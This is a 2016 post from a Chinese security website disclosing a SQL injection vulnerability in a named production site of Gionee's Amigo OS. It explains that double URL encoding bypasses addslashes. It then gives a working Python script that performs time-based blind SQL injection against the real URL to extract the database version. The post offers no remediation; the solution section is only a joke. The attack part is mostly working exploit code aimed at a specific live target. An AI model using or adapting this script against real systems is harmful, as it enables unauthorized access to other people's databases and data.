频道栏目
首页 > 安全 > 网站安全 > 正文
金立OS主站SQL注入(附py脚本)
2016-02-01 09:24:27         来源:null_z  
收藏   我要投稿

~~~~~

注入点https://www.amigo.cn/ami_stat/ami_stat.php?val2=undefined&val1=111*&type=search

注入参数为val1

正常检测不出来,需要doubleencode一下。

目测后面代码类似这样
 

$id=$_GET['id'];
    $id=addslashes($id);
    echo $id."
";
    $id=urldecode($id);
    echo $id."
";



先addslashes 然后url解码了,

所以需要将payload先编码再注入。

基于时间的盲注很慢,猜解version前十位

脚本如下
 

#!/usr/bin/env python
#-*-codnig:utf-8-*-

import requests
from urllib import quote
import time

url = 'https://www.amigo.cn/ami_stat/ami_stat.php?val2=undefined&val1={}&type=search'
payloads = '0123456789.abcdefghijklmnopqrstuvwxyz @_:'
user = ''

for i in range(1,10):
for p in payloads:
start_time = time.time()
try:
key = " 11' xor if(ascii(mid(version(),{},1))={},sleep(5),1) and '1'='1".format(i,ord(p))
u = url.format(quote(quote(key)))
req = requests.get(u,timeout=60)
except Exception,msg:
print msg
print key
if time.time() - start_time > 5:
user = user + p
print "\n" + user + "\n"
break

print '\n\nFinish: ' + user

 

屏幕快照 2016-01-11 11.39.35.png

 

解决方案:

你懂的~~~~

点击复制链接 与好友分享!回本站首页
相关TAG标签 脚本 金立
上一篇:p2p安全之爱合投某处SQL注入漏洞(影响37万用户)
下一篇:KesionCMS ASP版一处SQL注入
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站